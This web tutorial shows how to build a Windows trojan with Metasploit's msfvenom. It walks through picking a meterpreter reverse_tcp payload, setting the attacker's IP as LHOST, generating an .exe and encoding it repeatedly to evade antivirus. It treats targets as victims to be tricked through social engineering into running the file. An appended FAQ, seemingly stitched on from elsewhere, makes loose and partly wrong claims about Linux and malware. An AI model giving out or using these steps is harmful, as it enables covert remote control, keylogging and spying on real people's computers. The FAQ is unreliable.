How to Create a Trojan Virus in Kali Linux - Live Linux USB (2024)

Note: If you do not have Kali Linux, you can buy a pre-made ready to boot USB with Kali Linux on it from our shop or you can buy Kali Linux on Amazon.

In this article, we will be using one of Kali Linux’s vast selection of hacking tools to create a trojan (also known as a RAT (Remote Access Tool) in hacking circles). Depending on the tools we use, we can have access to our victim’s files and system processes, including the ability to record keystrokes or take a screenshot through their webcam.

A quick preview of what’s to come

  • We will update Kali Linux – Kali Linux and its tools are constantly growing and evolving. Updating periodically is a good practice.
  • Open our exploit software – in this tutorial, we will be using Metasploit, a software that generates trojan files and gives you backdoor access to the victim’s computer when they run the infected file. Metasploit comes pre-installed on all versions of Kali, making this step easier.
  • Choose our payload – Metasploit comes with a lengthy list of payloads, some more suited to different situations than others. We will be choosing a versatile and effective payload for hacking a windows machine.
  • Customize our payload – the payload needs information like our IP address and the listening port when we create it.
  • Generate the payload – once we give all our information to the payload, we need to generate it as a .exe file.
  • Encrypt the payload – antivirus programs might catch an unencrypted payload. By encrypting it, we reduce the chance of an antivirus catching us.

Step 1: Update and Upgrade Kali Linux

You should be periodically updating Kali Linux. If you haven’t upgraded in a while or you just booted it up, now is a good time to update.

Open the terminal by clicking the window at the top and type in:

sudo apt-get update

Next, type in:

sudo apt-get upgrade

This should update your system to the most recent version, ensuring that all the tools will work exactly as they should. Now we can begin.

Step 2: Open exploit software

How to Create a Trojan Virus in Kali Linux - Live Linux USB (1)

In this article, we will be using the metasploit framework. Metasploit is a software that comes pre-installed on all Kali Linux machines that allows you to create custom payloads that will link back to your computer from the victim’s computer. In this case, the payload is our RAT. Using metasploit, a hacker can create a payload, save it to a file, and trick some unsuspecting user into clicking on it through social engineering. If you don’t know what we mean by social engineering, think of the famous Nigerian Prince scam. The only difference in this case is that instead of tricking the user into giving him bank account information, the hacker tricks the user into clicking on a malicious file.

Open up the terminal and type in


This will show a list of commands available to you in metasploit. To see available payloads, type in

msfvenom -l payloads

How to Create a Trojan Virus in Kali Linux - Live Linux USB (2)

This will list all available payloads for you to use. As you can see, there are a lot of them. If you want to see other options, you can type in any of the other options listed on screen. You can see options like formatting, platforms, encoders (which will be discussed later in this article), encryption keys, bad characters, and many others.

Step 2.5: Fix any errors

When giving the command to list payloads, you might see this error:

How to Create a Trojan Virus in Kali Linux - Live Linux USB (3)

If you see this, it means that bundler is either set up incorrectly or hasn’t been updated.

Note: if you did not see this error, you can skip to step 3.

To fix this, change the current directory (file) to usr/share/metasploit-framework by typing in:

cd /usr/share/metasploit-framework/

from the root directory. If you make a mistake, you can type in

cd ..

to go back to the previous directory or type in any directory after cd to go there.

Now that we are in the metasploit-framework directory, type in

gem install bundler

to install bundler, then type in

bundle install

If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in

gem install bundler:[version number]

and then type in

gem update –system

How to Create a Trojan Virus in Kali Linux - Live Linux USB (4)

How to Create a Trojan Virus in Kali Linux - Live Linux USB (5)

After all of that, everything should work perfectly.

Type in

cd /root

to go back to the root directory.

Step 3: Choose our payload

Type in

msfvenom -l payloads

to see a list of payloads.

We recommend using windows/meterpreter/reverse_tcp. It allows you to keylog, sniff for data, and control the infected computer’s file system, microphone, and webcam. It is one of the most versatile, invasive, and devastating payloads in metasploit.

How to Create a Trojan Virus in Kali Linux - Live Linux USB (6)

Step 4: Customize our payload

Now that we have our payload, we can check what options we have. Type:

msfvenom –list-options -p [payload]

to see what we can change about the exploit and where the exploit sends the information.

How to Create a Trojan Virus in Kali Linux - Live Linux USB (7)

We see that LHOST is blank; this is where the exploit sends information from the infected device. In most cases, this will be your ip address.

To find your ip address, type


into the terminal to get this window. Your ip address is after the word “inet.” If you are connected to the internet via ethernet, use the ip address at eth0; if you are connected wirelessly, use the one at wlan0.

How to Create a Trojan Virus in Kali Linux - Live Linux USB (8)

Our ip address is our LHOST parameter.

Step 5: Generate the trojan

Now that we have our payload, ip address, and port number, we have all the information that we need. Type in:

msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -f [file type] > [path]

The file type should be exe, and the path should be the file name (make sure the file extension after the name and the file type match). Especially make sure to not press enter before putting the “> [path],” as this will run the exploit on your own device.

How to Create a Trojan Virus in Kali Linux - Live Linux USB (9)

If we look in our files using ls, we see that our new file pops up.

How to Create a Trojan Virus in Kali Linux - Live Linux USB (10)

Step 6: Encrypt the trojan

Since windows/meterpreter/reverse_tcp is a common exploit, many antivirus programs will detect it. However, we can encrypt the program so that an antivirus can’t catch it. Included with metasploit is a long list of encryptors. Type:

msfvenom -l encoders to see a list of them.

How to Create a Trojan Virus in Kali Linux - Live Linux USB (11)

Once you choose the encryption you want (we recommend x86/shikata_ga_nai), you can encrypt it multiple times when you type in the command to make the exploit. Encrypting the file multiple times helps prevent antivirus programs from catching your virus. Type in:

msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -e [encoder] -i [number of times to encrypt] -f [file type] > [path]

How to Create a Trojan Virus in Kali Linux - Live Linux USB (12)

Now we have made a trojan virus that has been encrypted and harder to recognize by an antivirus program. If we type ‘ls’ to look at our files, we see…

How to Create a Trojan Virus in Kali Linux - Live Linux USB (13)

Our new trojan is in our files.

Step 7: Open a Meterpreter Session so that the Trojan can connect back to you

For this step, please visit How to use Meterpreter when controlling a Trojan. Make sure that you use your ip address (the ip address of the computer running Kali and the one that you used when creating the trojan) and also use the same exploit: windows/meterpreter/reverse_tcp

If you are looking to create a Trojan for Mac OSX

  • How to use Macphish on Kali Linux to create a Trojan on a Mac
  • How to hack a Mac using a Trojan in Kali Linux

In conclusion:

  • We updated Kali Linux in order to keep everything working.
  • We generated a payload in metasploit with our IP address and listening port as parameters.
  • We waited for the victim to run the trojan, which in turn allowed us remote access to the victim’s computer and file system.

If you want to try this yourself but don’t have Kali Linux available to you, you can buy a live USB containing Kali Linux right here.

How to Create a Trojan Virus in Kali Linux - Live Linux USB (2024)


Does Kali Linux have virus? ›

In Kali Linux, Malware, viruses, and Trojans are uncommon however, they do exist. ClamAV is an excellent alternative if we only need an antivirus once in a while. ClamAV is a free antivirus that we can use for online scanning, email scanning, and endpoint security.

How do hackers use Trojans? ›

A hacker can use Trojans to edit and delete the files present on a victim system, or to observe the activities of the victim. Trojans can steal all your financial data like bank accounts, transaction details, PayPal related information, etc. These are called Trojan-Banker.

Does Trojan work on Linux? ›

If vulnerabilities are detected in your Linux operating system but you do not take countermeasures, trojans may be inserted into your system. You must remove trojans from your system at the earliest opportunity.

What is Trojan horse virus code? ›

A Trojan Horse is a program that uses malicious code masqueraded as a trusted application. The malicious code can be injected on benign applications, masqueraded in e-mail links, or sometimes hidden in JavaScript pages to make furtive attacks against vulnerable internet Browsers.

Why do hackers love Kali Linux? ›

Kali Linux supports more than 500 penetration testing and cybersecurity-related applications. It is an open-source operating system, so its code is freely available online, which means you can take a look and tweak it according to your needs. It also supports multiple languages and includes many customization features.

Do hackers use Kali? ›

Kali Linux is a one-of-a-kind operating system that is used openly by both the bad and good guys. This operating system is widely used by both black hat hackers and security administrators.

Can Trojans steal passwords? ›

These Trojans are designed to steal passwords from the victim's computer (although some steal other types of information also: IP address, registration details, e-mail client details, and so on). This information is then sent to an e-mail address coded into the body of the Trojan.

Can Trojan virus get passwords? ›

There are a variety of types of Trojans, many of which can launch sophisticated and clever attacks. Here are some types to be aware of: Password-stealing Trojans—These look for saved passwords on your computer and email them to the hackers. Some can even steal passwords cached in your browser history.

Is a Trojan a hacker code? ›

A Trojan virus on a computer, or simply a Trojan, is a malicious software program or code masquerading as legitimate and harmless software. Once it infects a device, it executes its task, which may include deleting or modifying data, stealing data, installing additional malware, and disrupting system performance.

Is it hard to get a virus on Linux? ›

With its user privileges, protection from system-wide infections and open-source nature, viruses are rare with Linux systems.

Do hackers run Linux? ›

Linux is the most popular choice for hackers due to its flexibility, open source platform, portability and command line interface and compatibility with popular hacking tools. Windows is a required, but dreaded target for most hackers because it requires them to work in Windows-only environments.

What is the famous Linux malware? ›

XorDDoS, Mirai and Mozi are the most prevalent Linux-based malware families observed in 2021, with Mozi registering a significant tenfold increase in the number of in-the-wild samples in 2021 compared to 2020.

What is the most famous Trojan horse virus? ›

ILOVEYOU (commonly referred to as the “ILOVEYOU virus”) was a trojan released in 2000, which was used in the world's most damaging cyberattack, which caused $8.7 billion in global losses.

What is a backdoor Trojan? ›

Backdoor Trojans are malicious software programs designed to grant unwanted access for a remote attack. Remote attackers can send commands or leverage full control over a compromised computer.

What are Trojans written in? ›

Most malware spotted in the wild is written in either C or C++, although there are numerous examples of malicious code using . NET, Python, Perl, JavaScript and Powershell. Much of this depends on what platform an attacker or cybercriminal is looking to target, said Adam Kujawa, director of Malwarebytes Lab.

Which Linux do hackers use? ›

Kali Linux

It is the most widely used ethical hacking OS. It is a Debian-based Linux - based operating system developed for penetration testing and digital forensics. It is financed and maintained by Offensive Security Ltd. The greatest and most widely used operating system for hackers is Kali Linux.

Who owns Kali Linux? ›

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security.

Why is Kali Linux named Kali? ›

Originally, it was designed with a focus on kernel auditing, from which it got its name Kernel Auditing Linux. The name is sometimes incorrectly assumed to come from Kali the Hindu goddess. The third core developer, Raphaël Hertzog, joined them as a Debian expert. Kali Linux is based on the Debian Testing branch.

Is Linux easy to hack? ›

Quick Note on Linux

Unlike other operating system, Linux is less secure when it comes to security. This is because the source code is available freely, so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source.

What software do hackers use? ›

Some of the most famous hacking tools in the market are Nmap (Network Mapper), Nessus, Nikto, Kismet, NetStumbler, Acunetix, Netsparker, and Intruder, Nmap, Metasploit, Aircrack-Ng, etc.

What things can Kali Linux hack? ›

Based on the Debian Linux distribution, Kali includes hacking tools that can be used to carry out and defend against brute-force attacks, wireless attacks, IP spoofing attacks, reverse-engineering attacks, password cracking, dictionary attacks, phishing attacks, SQL injection and more.

Can a Trojan infect wifi? ›

Trojan Attacks

A trojan attack tricks you into downloading malware hiding a virus that then tramples all over your phone, tablet, or computer. A router virus can ride inside a trojan, waiting to sniff out vulnerable public or home Wi-Fi networks to infect.

Can a Trojan give remote access? ›

A Remote Access Trojan (RAT) is a tool used by malware developers to gain full access and remote control on a user's system, including mouse and keyboard control, file access, and network resource access.

Can Trojans access your camera? ›

Cybercriminals can use so-called Trojan horse malware. You click on an attachment or download a piece of music or video infected with malware, and hey presto! – A cybercriminal can remotely control your PC's functions – including your camera and microphone and may even be able to record images and audio remotely.

How do hackers get passwords? ›

Keylogger programs enable hackers to spy on you, as the malware captures everything you type. Once inside, the malware can explore your computer and record keystrokes to steal passwords. When they get enough information, hackers can access your accounts, including your email, social media, and online banking.

What virus steals your passwords? ›

Trojan. PasswordStealer may attempt to steal stored credentials, usernames and passwords and other personal and confidential information. This information may be transmitted to a destination specified by the author. Trojan.

Can an IP address get a Trojan virus? ›

When a user types in a URL, the smart Trojan changes the "NameServer" registry key value to a fraudulent IP address. Phishers can design the fraudulent page to look very much like the pages of the site they are defrauding -- such as a bank or retailer -- and fool the user into typing in their account information.

What is trapdoor virus? ›

Trap Door – A trap door is a defect in the computer code that allows malicious actors to exploit the flaw and gain access to valuable information. Trojan Horse – A Trojan Horse traps and stores user login credentials, to send to malicious hackers who can use them to log in by impersonating the real and authorized user.

Is Zeus malware still active? ›

Like many forms of malware the Zbot was initially used to steal banking information. However, in 2011, the source code was released to the public, allowing multiple new variants to be created. The original code has apparently been retired, but new generations of Zeus trojans are still active today.

What is logic bomb virus? ›

A logic bomb is a set of instructions in a program carrying a malicious payload that can attack an operating system, program, or network. It only goes off after certain conditions are met. A simple example of these conditions is a specific date or time.

What was the first Linux virus? ›

Found in the fall of 1996, Staog is the first known Linux virus.

Why Linux has no virus? ›

When a Linux system is compromised, virus or malware will not get the root access to damage system wide. Only local files and programs of users will be affected, as the normal user will not have access permission to all the files in the system. This leads to least effect of virus in systems with Linux.

Why are viruses rare Linux? ›

Viruses that affect Linux are still very rare. Some argue that this is because Linux is not as widely used as other operating systems, so no one writes viruses for it. Others argue that Linux is intrinsically more secure, and security problems that viruses could make use of are fixed very quickly.

Is Parrot better than Kali? ›

Parrot OS is better in terms of offering an easy-to-use interface and tools, which can be grasped easily by beginners. However, both Kali Linux and Parrot OS provide learners with a bunch of tools they can make use of.

Which OS is safest? ›

What Is the Most Secure OS? 5 Secure PC Operating Systems to Consider
  1. Qubes OS. Qubes OS is an open-source, privacy-focused Linux distro that aims to provide security by isolation. ...
  2. macOS Monterey. ...
  3. Windows 11. ...
  4. OpenBSD. ...
  5. Whonix.
Sep 10, 2022

Is Linux Unhackable? ›

Linux is no more unhackable than other operating systems. You can however reduce its hackability with some simple precautions that unsurprisingly look like steps you would take for other systems. Minimal installation.

What is the scariest malware? ›

Top Five Malware
  1. Stuxnet. Stuxnet was considered the first known cyber weapon. ...
  2. EternalBlue. EternalBlue was a cyber-attack exploit developed by the U.S. National Security Agency (NSA) and then leaked by the hacker group Shadow Brokers. ...
  3. BlackEnergy and CrashOverride. ...
  4. TrickBot. ...
  5. ZeuS.

Do you need an antivirus on Kali Linux? ›

Yes, Linux devices do need antivirus protection. Although Linux is perceived to be more secure than other desktop operating systems, there are still malware and viruses that can affect Linux computers.

Can you trust Kali Linux? ›

The fact of the matter is, however, that Kali is a Linux distribution specifically geared towards professional penetration testers and security specialists, and given its unique nature, it is NOT a recommended distribution if you're unfamiliar with Linux or are looking for a general-purpose Linux desktop distribution ...

Is Linux safe from viruses? ›

It's a common myth that Linux systems are immune to viruses. While they do offer a higher level of protection against viruses than many other OSs, Linux systems can still succumb to infection. Viruses, as well as other forms of malware, can infect Linux systems.

Is it safe to install Kali Linux on laptop? ›

Currently, there are countless Linux based OS but Kali Linux is arguably one of the best choices. It is used by cybersecurity experts for penetration testing, ethical hacking, and network security assessments.

Is Kali Linux more secure than Windows? ›

Linux has segmented working environments which secure it from the attack of virus. However, Windows OS is not much segmented and thus it is more vulnerable to threats. Another significant reason for Linux being more secure is that Linux has very few users when compared to Windows.

How much secure Kali Linux is? ›

Running Kali Linux with the default settings, on the other hand, might be a bad decision, and the reason behind that is default settings are easy to crack, and Kali Linux is not privacy-focused distribution such as Tails OS; it is designed for attacking rather than defend. The concept of security is vast.

Why antivirus is not used in Linux? ›

Anti-virus software does exist for Linux, but you probably don't need to use it. Viruses that affect Linux are still very rare. Some argue that this is because Linux is not as widely used as other operating systems, so no one writes viruses for it.

What is the password for Kali Linux? ›

User: kali. Password: <ssh key>

Can Kali Linux damage your computer? ›

Ideally, no, Linux (or any other software) should not be able to physically harm hardware. Not having drivers might mean that you can't use certain pieces of hardware, but you certainly shouldn't be able to damage them, either.

How powerful is Kali Linux? ›

Kali Linux boasts more than 300 security testing tools. Many of them, especially the most basic exploits, come from Kali's predecessor, Backtrack. But Kali includes newer tools that are designed to test recent improvements in cyber security.

Is installing Linux risky? ›

Yes, it is 'mostly safe' to install any utility or software so long as you are using the default repositories that come with new installs of the OS. The default repositories contain software that is tested by the developers and/or maintainers of the Linux distro.

Should I install Kali on USB? ›

One of the fastest method, for getting up and running with Kali Linux is to run it “live” from a USB drive.

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Introduction: My name is Chrissy Homenick, I am a tender, funny, determined, tender, glorious, fancy, enthusiastic person who loves writing and wants to share my knowledge and understanding with you.